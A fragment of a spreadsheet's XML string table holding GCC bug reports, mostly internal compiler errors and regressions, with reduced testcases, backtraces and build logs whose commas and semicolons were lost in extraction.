    <t>GCC-59591</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in vect_get_vec_def_for_stmt_copy at tree-vect-stmts.c:156 for -march=core-avx2</t>
  </si>
  <si>
    <t>Started after r206069 and reproduced on 481.wrf from spec2006
Reduced testcase attached
Options for reproducing 
gfortran -O2 -ftree-vectorize  -march=core-avx2 -c</t>
  </si>
  <si>
    <t>GCC-58069</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in tree_ssa_unswitch_loops at -O3 in 32 bit mode</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O3 on x86_64-linux in 32-bit mode only. This is a regression from 4.8.x.
It may be related to 58018 which also manifests in 64-bit mode though. 
This testcase is also a lot more complex than the one for 58018 I wasn't able to reduce it further. 
$ gcc-trunk -v
gcc version 4.9.0 20130801 (experimental) [trunk revision 201397] (GCC) 
$ gcc-trunk -m64 -O3 reduced.c
/tmp/ccHrLaas.o: In function `main':
reduced.c:(.text.startup+0x7): undefined reference to `fn2'
reduced.c:(.text.startup+0x18): undefined reference to `fn3'
reduced.c:(.text.startup+0x54): undefined reference to `fn7'
reduced.c:(.text.startup+0x76): undefined reference to `fn4'
reduced.c:(.text.startup+0x87): undefined reference to `fn6'
reduced.c:(.text.startup+0x96): undefined reference to `fn5'
collect2: error: ld returned 1 exit status
$ gcc-trunk -m32 -O2 reduced.c
/tmp/cc6hsIbp.o: In function `main':
reduced.c:(.text.startup+0x55): undefined reference to `fn2'
reduced.c:(.text.startup+0x72): undefined reference to `fn4'
reduced.c:(.text.startup+0xfe): undefined reference to `fn7'
reduced.c:(.text.startup+0x117): undefined reference to `fn3'
reduced.c:(.text.startup+0x127): undefined reference to `fn6'
reduced.c:(.text.startup+0x137): undefined reference to `fn5'
collect2: error: ld returned 1 exit status
$ gcc-4.8 -m32 -O3 reduced.c
/tmp/ccCehBNw.o: In function `main':
reduced.c:(.text.startup+0xa): undefined reference to `fn2'
reduced.c:(.text.startup+0x18): undefined reference to `fn3'
reduced.c:(.text.startup+0x52): undefined reference to `fn7'
reduced.c:(.text.startup+0x6f): undefined reference to `fn4'
reduced.c:(.text.startup+0x7e): undefined reference to `fn6'
reduced.c:(.text.startup+0x8e): undefined reference to `fn5'
collect2: error: ld returned 1 exit status
$ gcc-trunk -m32 -O3 reduced.c
reduced.c: In function â€˜mainâ€™:
reduced.c:43:5: internal compiler error: Segmentation fault
 int main ()
     ^
0x7d52ef crash_signal
	../../gcc-trunk/gcc/toplev.c:334
0x7fd37b ssa_default_def(function* tree_node*)
	../../gcc-trunk/gcc/tree-dfa.c:314
0x7fd640 get_or_create_ssa_default_def(function* tree_node*)
	../../gcc-trunk/gcc/tree-dfa.c:362
0x8168ea get_reaching_def
	../../gcc-trunk/gcc/tree-into-ssa.c:1184
0x81ca5a maybe_replace_use
	../../gcc-trunk/gcc/tree-into-ssa.c:1784
0x81ca5a rewrite_update_stmt
	../../gcc-trunk/gcc/tree-into-ssa.c:1967
0x81ca5a rewrite_update_enter_block
	../../gcc-trunk/gcc/tree-into-ssa.c:2136
0xb3716a walk_dominator_tree(dom_walk_data* basic_block_def*)
	../../gcc-trunk/gcc/domwalk.c:210
0x8155f3 rewrite_blocks
	../../gcc-trunk/gcc/tree-into-ssa.c:2216
0x81bd0e update_ssa(unsigned int)
	../../gcc-trunk/gcc/tree-into-ssa.c:3303
0xb9e4da tree_unswitch_single_loop
	../../gcc-trunk/gcc/tree-ssa-loop-unswitch.c:358
0xb9eac8 tree_ssa_unswitch_loops()
	../../gcc-trunk/gcc/tree-ssa-loop-unswitch.c:116
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
---------------------------------------
int a b c e p
static int *d = 
static int foo (int p)
{
  int f i j = 0 *g =  
  int h[] = { 0 0 0 1 0 0 0 0 1 }
  for (i = 0 i &lt; 1 i++)
    {
      int *k = 
      {
	int **l = 0
	int ***m = 
	int ****n = 
	j || fn2 ()
	*n = 0
	if (*g)
	  fn3 ()
	else
	  {
	    *k = 0
	    fn4 ()
	  }
      }
      *g = *k
      for (j = 8 j &gt;= 0 j--)
        {
	  for (f = 3 f &lt;= 8 f++)
	    *d |= h[f] 
	  if (e)
            {
	      fn5 (fn6 () 
	      return 0
            }
	  int *o = 
	  *d = -1L &lt;= ((*o ^= *k) 
        }
      fn7 (p &lt;= (a 
    }
}
int main ()
{
  p = foo (1)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-69677</t>
  </si>
  <si>
    <t>[6 Regression] bootstrap failed with --with-arch=corei7 --with-cpu=corei7</t>
  </si>
  <si>
    <t>On ia32 r233128 failed to bootstrap when configured with
--with-arch=corei7 --with-cpu=corei7 --prefix=/usr/6.0.0 --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --enable-libmpx i686-linux --with-fpmath=sse --enable-languages=cc++fortranjavaltoobjc
https://gcc.gnu.org/ml/gcc-regression/2016-02/msg00068.html
[hjl@gnu-skl-1 gcc]$ cat /tmp/x.i
typedef int DItype __attribute__ ((mode (DI)))
typedef int SItype __attribute__ ((mode (SI)))
typedef unsigned int USItype __attribute__ ((mode (SI)))
struct DWstruct {SItype low high}
typedef union
{
  struct DWstruct s
  DItype ll
} DWunion
DItype
__negdi2 (DItype u)
{
  const DWunion uu = {.ll = u}
  const DWunion w = { {.low = -uu.s.low
         .high = -uu.s.high - ((USItype) -uu.s.low &gt; 0) } }
  return w.ll
}
[hjl@gnu-skl-1 gcc]$ ./xgcc -B./ -S -O2 /tmp/x.i
/tmp/x.i: In function â€˜__negdi2â€™:
/tmp/x.i:18:1: internal compiler error: Segmentation fault
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[hjl@gnu-skl-1 gcc]$ 
(gdb) bt
#0  0x086ffe63 in val_signbit_p(machine_mode unsigned long long) ()
#1  0x08d73438 in combine_simplify_rtx(rtx_def* machine_mode int int) ()
#2  0x08d750ad in subst(rtx_def* rtx_def* rtx_def* int int int) ()
#3  0x08d74e1f in subst(rtx_def* rtx_def* rtx_def* int int int) ()
#4  0x08d76327 in try_combine(rtx_insn* rtx_insn* rtx_insn* rtx_insn* int* rtx_insn*) ()
#5  0x08d7c4b1 in (anonymous namespace)::pass_combine::execute(function*) ()
#6  0x08662051 in execute_one_pass(opt_pass*) ()
#7  0x08662669 in execute_pass_list_1(opt_pass*) ()
#8  0x0866267c in execute_pass_list_1(opt_pass*) ()
#9  0x086626c9 in execute_pass_list(function* opt_pass*) ()
#10 0x08358b33 in cgraph_node::expand() ()
#11 0x0835a3e4 in symbol_table::compile() [clone .part.51] ()
#12 0x0835c73f in symbol_table::finalize_compilation_unit() ()
#13 0x0872b897 in compile_file() ()
#14 0x081d6871 in toplev::main(int char**) ()
#15 0x081d8911 in main ()
(gdb) disass
Dump of assembler code for function _Z13val_signbit_p12machine_modey:
   0x086ffe10 :	push   %ebx
   0x086ffe11 :	xor    %eax%eax
   0x086ffe13 :	sub    $0x10%esp
   0x086ffe16 :	mov    0x18(%esp)%edx
   0x086ffe1a :	mov    0x1c(%esp)%ecx
   0x086ffe1e :	mov    0x20(%esp)%ebx
   0x086ffe22 :	cmpb   $0x20x8f99440(%edx)
   0x086ffe29 :	mov    %ecx(%esp)
   0x086ffe2c :	mov    %ebx0x4(%esp)
   0x086ffe30 :	je     0x86ffe40 
   0x086ffe32 :	add    $0x10%esp
   0x086ffe35 :	pop    %ebx
   0x086ffe36 :	ret    
   0x086ffe37 :	mov    %esi%esi
   0x086ffe39 :	lea    0x0(%edi%eiz1)%edi
   0x086ffe40 :	movzwl 0x8f99360(%edx%edx1)%ecx
   0x086ffe48 :	sub    $0x1%ecx
   0x086ffe4b :	cmp    $0x3f%ecx
   0x086ffe4e :	ja     0x86ffe32 
   0x086ffe50 :	movq   0x8f98ea0(%edx8)%xmm0
   0x086ffe59 :	xor    %eax%eax
   0x086ffe5b :	xor    %edx%edx
---Type  to continue or q  to quit---
   0x086ffe5d :	test   $0x20%cl
   0x086ffe60 :	sete   %al
=&gt; 0x086ffe63 :	movdqa (%esp)%xmm2
   0x086ffe68 :	setne  %dl
   0x086ffe6b :	shl    %cl%eax
   0x086ffe6d :	shl    %cl%edx
   0x086ffe6f :	pand   %xmm0%xmm2
   0x086ffe73 :	movd   %eax%xmm0
   0x086ffe77 :	pinsrd $0x1%edx%xmm0
   0x086ffe7d :	pxor   %xmm2%xmm0
   0x086ffe81 :	punpcklqdq %xmm0%xmm0
   0x086ffe85 :	ptest  %xmm0%xmm0
   0x086ffe8a :	sete   %al
   0x086ffe8d :	add    $0x10%esp
   0x086ffe90 :	pop    %ebx
   0x086ffe91 :	ret    
End of assembler dump.
(gdb) p $esp
$1 = (void *) 0xffffcb68
(gdb)</t>
  </si>
  <si>
    <t>GCC-70843</t>
  </si>
  <si>
    <t>[7 Regression] ICE in add_expr at tree.c:7913</t>
  </si>
  <si>
    <t>Created attachment 38358
testcase
Hi
Since commit r235507 (PR sanitizer/70683) I see ICEs on arm*-linux* targets when building glibc.
$ arm-none-linux-gnueabihf-gcc llseek.i -c -std=gnu99 -fgnu89-inline  -O2 -Wall -Winline -Wundef -Wwrite-strings -fmerge-all-constants -frounding-math -g -Wstrict-prototypes -S
../sysdeps/unix/sysv/linux/llseek.c: In function '__llseek':
../sysdeps/unix/sysv/linux/llseek.c:35:25: internal compiler error: in add_expr at tree.c:7913
                         ^
0xd6e104 inchash::add_expr(tree_node const* inchash::hash&amp; unsigned int)
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/tree.c:7913
0xd6d6a5 inchash::add_expr(tree_node const* inchash::hash&amp; unsigned int)
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/tree.c:7990
0xd6d6a5 inchash::add_expr(tree_node const* inchash::hash&amp; unsigned int)
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/tree.c:7990
0xd6dc29 inchash::add_expr(tree_node const* inchash::hash&amp; unsigned int)
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/tree.c:7990
0x7d0322 operand_equal_p(tree_node const* tree_node const* unsigned int)
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/fold-const.c:2760
0x7f5ed0 operand_equal_for_comparison_p
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/fold-const.c:3345
0x801385 fold_ternary_loc(unsigned int tree_code tree_node* tree_node* tree_node* tree_node*)
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/fold-const.c:11581
0x802721 fold_build3_stat_loc(unsigned int tree_code tree_node* tree_node* tree_node* tree_node*)
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/fold-const.c:12582
0x5e155c c_fully_fold_internal
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/c/c-fold.c:506
0x5e45da c_fully_fold(tree_node* bool bool*)
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/c/c-fold.c:90
0x586264 c_finish_return(unsigned int tree_node* tree_node*)
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/c/c-typeck.c:9650
0x5cb2bc c_parser_statement_after_labels
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/c/c-parser.c:5216
0x5cc53b c_parser_compound_statement_nostart
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/c/c-parser.c:4858
0x5cce2e c_parser_compound_statement
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/c/c-parser.c:4693
0x5ce300 c_parser_declaration_or_fndef
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/c/c-parser.c:2105
0x5d79a6 c_parser_external_declaration
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/c/c-parser.c:1549
0x5d84b9 c_parser_translation_unit
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/c/c-parser.c:1430
0x5d84b9 c_parse_file()
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/c/c-parser.c:17915
0x63c8d2 c_common_parse_file()
	/home/christophe.lyon/src/GCC/sources/gcc-fsf/trunk-for-crontab/gcc/c-family/c-opts.c:1064
GCC configured as:
--target=arm-none-linux-gnueabihf --with-float=hard --enable-build-with-cxx --with-mode=arm --with-cpu=cortex-a9 --with-fpu=neon</t>
  </si>
  <si>
    <t>GCC-41665</t>
  </si>
  <si>
    <t>Typo in addsi_1_zext?</t>
  </si>
  <si>
    <t>There are
(define_insn addsi_1_zext
  [(set (match_operand:DI 0 register_operand =rr)
        (zero_extend:DI
          (plus:SI (match_operand:SI 1 nonimmediate_operand %0r)
                   (match_operand:SI 2 general_operand gli))))
   (clobber (reg:CC FLAGS_REG))]
  TARGET_64BIT &amp;&amp; ix86_binary_operator_ok (PLUS SImode operands)
{
  switch (get_attr_type (insn))
    {
    case TYPE_LEA:
      operands[2] = SET_SRC (XVECEXP (PATTERN (insn) 0 0))
      return lea{l}\t{%a2 %k0|%k0 %a2}
    case TYPE_INCDEC:
      if (operands[2] == const1_rtx)
        return inc{l}\t%k0
      else
        {
          gcc_assert (operands[2] == constm1_rtx)
          return dec{l}\t%k0
        }
    default:
      /* Make things pretty and `subl $4%eax' rather than `addl $-4 %eax'.
         Exceptions: -128 encodes smaller than 128 so swap sign and op.  */
      if (CONST_INT_P (operands[2])
          &amp;&amp; (INTVAL (operands[2]) == 128
              || (INTVAL (operands[2]) &lt; 0
                  &amp;&amp; INTVAL (operands[2]) != -128)))
        {
          operands[2] = GEN_INT (-INTVAL (operands[2]))
          return sub{l}\t{%2 %k0|%k0 %2}
        }
      return add{l}\t{%2 %k0|%k0 %2}
    }
}
Shouldn't it be
(plus:SI (match_operand:SI 1 nonimmediate_operand %00)
Am I missing something?</t>
  </si>
  <si>
    <t>GCC-24705</t>
  </si>
  <si>
    <t>ICE on assumed length character result</t>
  </si>
  <si>
    <t>character (6) :: c
  c = f1 ()
  if (c .ne. 'abcdef') call abort
contains
  function f1 ()
    character (*) :: f1
    f1 = 'abcdef'
  end function f1
end
causes ICE while it should be diagnosed as error.</t>
  </si>
  <si>
    <t>GCC-71667</t>
  </si>
  <si>
    <t>[7 Regression] ICE in as_a at is-a.h:192 w/ -g -O2 -ftree-vectorize</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20160619 ICEs on the following reduced testcase w/ -O2 (-O3 -Ofast) -g -ftree-vectorize:
unsigned int mu
int pt
void
qf (void)
{
  int gy
  long int vz
  for ()
    {
      for (gy = 0 gy &lt; 80 ++gy)
      {
        vz = mu
        ++mu
        pt = (vz != 0) 
      }
      while (gy &lt; 81)
        while (gy &lt; 83)
          {
            vz = (vz != 0) ? 0 : mu
            ++gy
          }
      pt = vz
      ++mu
    }
}
% gcc-7.0.0-alpha20160619 -c -O2 -g -ftree-vectorize jjgn2cjj.c      
jjgn2cjj.c: In function 'qf':
jjgn2cjj.c:5:1: internal compiler error: in as_a at is-a.h:192
 qf (void)
 ^~</t>
  </si>
  <si>
    <t>alahay01</t>
  </si>
  <si>
    <t>GCC-30730</t>
  </si>
  <si>
    <t>-Wunsafe-loop-optimizations gives too many warnings</t>
  </si>
  <si>
    <t>$ cat &gt; warning.c
#if 0
gcc-4.1.1 -c -Os warning.c -Wunsafe-loop-optimizations
exit 0
#endif
void foo(unsigned int n)
{
        while (n &gt; 10)
                n -= 2
}
^D
$ sh warning.c
warning.c: In function 'foo':
warning.c:8: warning: cannot optimize loop the loop counter may overflow
warning.c:8: warning: cannot optimize loop the loop counter may overflow
...
This warning seems to be wrong to me or at least badly worded. Furthermore gcc should notice that the condition states n &gt;= 10 and n is decremented by only 2 in each iteration so the loop _will_ terminate. There won't be any overflow.
It would also be nice if this warning were only printed once instead of 9 times.</t>
  </si>
  <si>
    <t>GCC-37307</t>
  </si>
  <si>
    <t>[4.4 Regression]: g++.dg/pch/system-2.C</t>
  </si>
  <si>
    <t>With revision 139755 this test passed.
From revision 139763 and on this test has failed as follows:
Running /tmp/hpautotest-gcc1/gcc/gcc/testsuite/g++.dg/pch/pch.exp ...
FAIL: g++.dg/pch/system-2.C -O2 -g assembly comparison
with the message in the logfile being:
PASS: g++.dg/pch/system-2.C -O2 -g (test for excess errors)
line #8480
&lt; .LASF138:
&gt; .LASF240:
line #8481
&lt;       .string _ZNSolsEv
&gt;       .string _ZNKSs6_M_repEv
line #8482
&lt; .LASF240:
&gt; .LASF373:
line #8483
&lt;       .string _ZNKSs6_M_repEv
&gt;       .string _ZNKSs5rfindEPKcm
line #8484
&lt; .LASF373:
&gt; .LASF61:
line #8485
&lt;       .string _ZNKSs5rfindEPKcm
&gt;       .string _ZNSt8ios_base9boolalphaE
line #8486
... (pruned)
line #9342
&lt; .LASF446:
&gt; .LASF121:
line #9343
&lt;       .string time
&gt;       .string ios_base
line #9344
&lt; .LASF121:
&gt; .LASF459:
line #9345
&lt;       .string ios_base
&gt;       .string _ZNSt6locale13_S_categoriesE
line #9346
&lt; .LASF459:
&gt; .LASF415:
line #9347
&lt;       .string _ZNSt6locale13_S_categoriesE
&gt;       .string _ZNKSs4_Rep12_M_is_leakedEv
line #9348
&lt; .LASF415:
&gt; .LASF138:
line #9349
&lt;       .string _ZNKSs4_Rep12_M_is_leakedEv
&gt;       .string _ZNSolsEPFRSoS_E
FAIL: g++.dg/pch/system-2.C -O2 -g assembly comparison
Looks like some variable isn't GTY-marked but its not just dw2_string_counter and I can't see one in the patch.
Authors of patches in suspect revision range CC:ed.</t>
  </si>
  <si>
    <t>GCC-48304</t>
  </si>
  <si>
    <t>ICE: SIGFPE (division by zero) in maybe_hot_count_p at predict.c:145 with --param hot-bb-count-fraction=0 -fprofile-use</t>
  </si>
  <si>
    <t>Created attachment 23783
reduced testcase
Compiler output:
$ rm *.gcda
$ gcc --param hot-bb-count-fraction=0 testcase.c -fprofile-generate
$ ./a.out
$ gcc --param hot-bb-count-fraction=0 testcase.c -fprofile-use
Program received signal SIGFPE Arithmetic exception.
0x00000000007fdece in maybe_hot_count_p (e=0x7ffff599b1c0) at /mnt/svn/gcc-trunk/gcc/predict.c:145
145               &gt; profile_info-&gt;sum_max / PARAM_VALUE (HOT_BB_COUNT_FRACTION))</t>
  </si>
  <si>
    <t>GCC-40607</t>
  </si>
  <si>
    <t>[4.5 Regression] Revision 149032 breaks bootstrap</t>
  </si>
  <si>
    <t>At the beginning of stage2 the following error occurs:
          /home/dave/gnu/gcc/objdir/./prev-gcc/xgcc -B/home/dave/gnu/gcc/objdir/
./prev-gcc/ -B/home/dave/opt/gnu/gcc/gcc-4.5.0/hppa-linux/bin/ -B/home/dave/opt/
gnu/gcc/gcc-4.5.0/hppa-linux/bin/ -B/home/dave/opt/gnu/gcc/gcc-4.5.0/hppa-linux/
lib/ -isystem /home/dave/opt/gnu/gcc/gcc-4.5.0/hppa-linux/include -isystem /home
/dave/opt/gnu/gcc/gcc-4.5.0/hppa-linux/sys-include    -c -DHAVE_CONFIG_H -g -O2 
 -I. -I../../gcc/libiberty/../include  -W -Wall -Wwrite-strings -Wc++-compat -Ws
trict-prototypes -pedantic  -fPIC ../../gcc/libiberty/strsignal.c -o pic/strsign
al.o \
        else true fi
../../gcc/libiberty/strsignal.c:554:1: error: conflicting types for 'psignal'
/usr/include/signal.h:141:13: note: previous declaration of 'psignal' was here
make[3]: *** [strsignal.o] Error 1
This occurs because the configure test failed:
configure:7828: checking for psignal
configure:7884:  /home/dave/gnu/gcc/objdir/./prev-gcc/xgcc -B/home/dave/gnu/gcc/
objdir/./prev-gcc/ -B/home/dave/opt/gnu/gcc/gcc-4.5.0/hppa-linux/bin/ -B/home/da
ve/opt/gnu/gcc/gcc-4.5.0/hppa-linux/bin/ -B/home/dave/opt/gnu/gcc/gcc-4.5.0/hppa
-linux/lib/ -isystem /home/dave/opt/gnu/gcc/gcc-4.5.0/hppa-linux/include -isyste
m /home/dave/opt/gnu/gcc/gcc-4.5.0/hppa-linux/sys-include    -o conftest -g -O2 
   conftest.c  &gt;&amp;5
conftest.c: In function 'main':
conftest.c:83:1: internal compiler error: in expand_expr_real_1 at expr.c:9112
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
configure:7890: $? = 1
configure: failed program was:
| /* confdefs.h.  */
| 
| #define PACKAGE_NAME 
| #define PACKAGE_TARNAME 
| #define PACKAGE_VERSION 
| #define PACKAGE_STRING 
| #define PACKAGE_BUGREPORT 
| #define _FILE_OFFSET_BITS 64
| #define WORDS_BIGENDIAN 1
| #define HAVE_SYS_FILE_H 1
| #define HAVE_SYS_PARAM_H 1
| #define HAVE_LIMITS_H 1
| #define HAVE_STDLIB_H 1
| #define HAVE_MALLOC_H 1
| #define HAVE_STRING_H 1
| #define HAVE_UNISTD_H 1
| #define HAVE_STRINGS_H 1
| #define HAVE_SYS_TIME_H 1
| #define HAVE_TIME_H 1
| #define HAVE_SYS_RESOURCE_H 1
| #define HAVE_SYS_STAT_H 1
| #define HAVE_SYS_MMAN_H 1
| #define HAVE_FCNTL_H 1
| #define HAVE_ALLOCA_H 1
| #define HAVE_SYS_SYSINFO_H 1
| #define HAVE_SYS_SYSCTL_H 1
| #define HAVE_STDINT_H 1
| #define HAVE_STDIO_EXT_H 1
| #define HAVE_SYS_WAIT_H 1
| #define TIME_WITH_SYS_TIME 1
| #define STDC_HEADERS 1
| #define HAVE_SYS_TYPES_H 1
| #define HAVE_SYS_STAT_H 1
| #define HAVE_STDLIB_H 1
| #define HAVE_STRING_H 1
| #define HAVE_MEMORY_H 1
| #define HAVE_STRINGS_H 1
| #define HAVE_INTTYPES_H 1
| #define HAVE_STDINT_H 1
| #define HAVE_UNISTD_H 1
| #define SIZEOF_INT 4
| #define UNSIGNED_64BIT_TYPE uint64_t
| #define HAVE_UINTPTR_T 1
| #define STACK_DIRECTION 1
| #define HAVE_UNISTD_H 1
| #define vfork fork
| #define HAVE_SYS_ERRLIST 1
| #define HAVE_SYS_NERR 1
| #define HAVE_SYS_SIGLIST 1
| /* end confdefs.h.  */
| /* System header to define __stub macros and hopefully few prototypes
|     which can conflict with char psignal () below.
|     Prefer  to  if __STDC__ is defined since
|      exists even on freestanding compilers.  Under hpux
|     including  includes  and causes problems
|     checking for functions defined therein.  */
| #if defined (__STDC__) &amp;&amp; !defined (_HPUX_SOURCE)
| # include 
| #else
| # include 
| #endif
| /* Override any gcc2 internal prototype to avoid an error.  */
| #ifdef __cplusplus
| extern C
| {
| #endif
| /* We use char because int might match the return type of a gcc2
|    builtin and then its argument prototype would still apply.  */
| char psignal ()
| /* The GNU C library defines this for functions which it implements
|     to always fail with ENOSYS.  Some functions are actually named
|     something starting with __ and the normal name is an alias.  */
| #if defined (__stub_psignal) || defined (__stub___psignal)
| choke me
| #else
| char (*f) () = psignal
| #endif
| #ifdef __cplusplus
| }
| #endif
| 
| int
| main ()
| {
| return f != psignal
|   
|   return 0
| }
2009-06-28  Paolo Bonzini  
        * expr.c (expand_expr_real_1): Just use do_store_flag.
        (do_store_flag): Drop support for TRUTH_NOT_EXPR.  Use
        emit_store_flag_force.
        * expmed.c (emit_store_flag_force): Copy here trick
        previously in expand_expr_real_1.  Try reversing the comparison.
        (emit_store_flag_1): Work if target is NULL.
        (emit_store_flag): Work if target is NULL using the result mode
        from the comparison.  Use split_comparison restructure final part
        to simplify conditionals.
dave@mx3210:~/gnu/gcc/objdir/prev-gcc$ ./xgcc -B./ -v
Reading specs from ./specs
Target: hppa-linux
Configured with: ../gcc/configure --with-gnu-as --with-gnu-ld --enable-shared --prefix=/home/dave/opt/gnu/gcc/gcc-4.5.0 --with-local-prefix=/home/dave/opt/gnu --enable-threads=posix --enable-__cxa_atexit --build=hppa-linux --enable-clocale=gnu --enable-java-gc=boehm --enable-java-awt=xlib --enable-languages=cc++objcfortranobj-c++javaada
Thread model: posix
gcc version 4.5.0 20090628 (experimental) [trunk revision 149032] (GCC)</t>
  </si>
  <si>
    <t>GCC-65962</t>
  </si>
  <si>
    <t>Missed vectorization of strided stores</t>
  </si>
  <si>
    <t>This does not vectorize at -O3 on x86_64/-mavx or aarch64:
int
loop (int *data)
{
  int tot = 0
  for (int i = 0 i &lt; 256 i++)
    data[i * 2] += 7
  return tot
}
-fdump-tree-vect-details reveals:
loadstore.c:6:3: note: === vect_analyze_data_ref_accesses ===
loadstore.c:6:3: note: Detected single element interleaving *_8 step 8
loadstore.c:6:3: note: Data access with gaps requires scalar epilogue loop
loadstore.c:6:3: note: not consecutive access *_8 = _10
loadstore.c:6:3: note: not vectorized: complicated access pattern.
loadstore.c:6:3: note: bad data access.
However a similar testcase that only reads from those locations vectorizes ok:
int
loop_12 (int *data)
{
  int tot = 0
  for (int i = 0 i &lt; 256 i++)
    tot += data[i * 2]
  return tot
}
blocksort.c:6:3: note: === vect_analyze_data_ref_accesses ===
blocksort.c:6:3: note: Detected single element interleaving *_7 step 8
blocksort.c:6:3: note: Data access with gaps requires scalar epilogue loop</t>
  </si>
  <si>
    <t>GCC-46638</t>
  </si>
  <si>
    <t>Wrong result with TRANSFER from string to DT</t>
  </si>
  <si>
    <t>The following program of James Van Buskirk prints with gfortran 4.3 to 4.6:
0000000A 0000000A 0000000A 0000000A
Expected result (as with NAG g95 ifort):
0000000A 756E6547 49656E69 6C65746E
Found at http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/1b907e3b7b6f3461
program test5
   use ISO_C_BINDING
   implicit none
   type bind(C) :: CPUID_type
      integer(C_INT32_T) eax
      integer(C_INT32_T) ebx
      integer(C_INT32_T) edx
      integer(C_INT32_T) ecx
   end type CPUID_type
   type(CPUID_TYPE) result
result = transfer(achar(10)//achar(0)//achar(0)//achar(0)//'GenuineIntel'result)
write(*'(4(z8.8:1x))') result
end program test5</t>
  </si>
  <si>
    <t>GCC-25926</t>
  </si>
  <si>
    <t>A87B59A SIGABRT</t>
  </si>
  <si>
    <t>515 (hiauly1)dave&gt; gdb a87b59a
GNU gdb 6.3.50.20050226-cvs
Copyright 2004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hppa1.1-hp-hpux10.20...
(gdb) r
Starting program: /users/bin/gcc/gcc-4.1/objdir/gcc/testsuite/ada/acats/tests/a/a87b59a/a87b59a
.. A87B59A ACATS 2.5 06-01-23 10:43:00
---- A87B59A CHECK THAT BECAUSE A GENERIC ACTUAL PROGRAM PARAMETER MUST
                BE A SUBPROGRAM AN ENUMERATION LITERAL OR AN ENTRY
                WITH THE SAME PARAMETER AND RESULT TYPE PROFILE AS THE
                FORMAL PARAMETER AN OVERLOADED NAME APPEARING AS AN
                ACTUAL PARAMETER CAN BE RESOLVED.
Program received signal SIGABRT Aborted.
0x7aff9f50 in kill () from /usr/lib/libc.1
(gdb) bt
#0  0x7aff9f50 in kill () from /usr/lib/libc.1
#1  0x7af6299c in raise () from /usr/lib/libc.1
#2  0x7af44478 in _sigaddset () from /usr/lib/libc.1
#3  0x7af3ef64 in abort () from /usr/lib/libc.1
#4  0x0003507c in uw_init_context_1 (context=0x40058928 outer_cfa=0x40058920
    outer_ra=0x304f3) at ../../gcc/gcc/unwind-dw2.c:1103
#5  0x000355a0 in _Unwind_RaiseException (exc=0x7b03783c)
    at ../../gcc/gcc/unwind.inc:93
#6  0x000304f0 in __gnat_Unwind_RaiseException (e=0x400595fc)
    at raise-gcc.c:1115
#7  0x00019e78 in ada.exceptions.exception_propagation.propagate_exception (
    from_signal_handler=252) at a-exexpr.adb:584
#8  0x00019eb8 in ada.exceptions.process_raise_exception (e=0x400595fc
    from_signal_handler=false) at a-except.adb:776
#9  0x00019f1c in  (e=0x400595fc)
    at a-except.adb:829
#10 0x0001a614 in  (e=0x400585b8
    message=) at a-except.adb:859
#11 0x0001777c in system.tasking.initialization.do_pending_action (
    self_id=0x4003ad90) at s-tasini.adb:286
#12 0x0001783c in system.tasking.initialization.undefer_abort_nestable (
    self_id=0x7b037054) at s-tasini.adb:735
#13 0x0002926c in system.tasking.rendezvous.selective_wait (open_accepts=
---Type  to continue or q  to quit---
      {P_ARRAY = 0x400585b8 P_BOUNDS = 0x400585b0}
    select_mode=system__tasking__terminate_mode) at s-tasren.adb:987
#14 0x0002de6c in a87b59a__tkTKB___1599 ()
#15 0x0002b1b0 in system.tasking.stages.task_wrapper (self_id=0x4003ad90)
    at s-tassta.adb:969
#16 0x7ae76d28 in cma__thread_base () from /usr/lib/libcma.1
#17 0x7ae7b8e8 in cma__thread_start1 () from /usr/lib/libcma.1
#18 0x7ae7b2dc in cma__thread_start0 () from /usr/lib/libcma.1
#19 0x7ae7b2dc in cma__thread_start0 () from /usr/lib/libcma.1
Previous frame identical to this frame (corrupt stack?)
This might be an ada issue but I think it's likely a problem introduced
by the new dwarf2 exception support on this target.</t>
  </si>
  <si>
    <t>GCC-48753</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: gcc.dg/tree-prof/val-prof-2.c</t>
  </si>
  <si>
    <t>On Linux/x86 revision 172872 gave
FAIL: gcc.dg/tree-prof/val-prof-2.c scan-tree-dump optimized n_[0-9]* \+ 0xffff
Revision 172869 is OK.</t>
  </si>
  <si>
    <t>GCC-13189</t>
  </si>
  <si>
    <t xml:space="preserve"> fails to compile</t>
  </si>
  <si>
    <t>This file has an extreme case of bitrot. It currently fails because it
hasn't been updated to compile with the new parser. Fixing that is not
likely to help though since enc_char_traits::state_type and
enc_char_traits::pos_type don't meet the requirements for basic_filebuf.
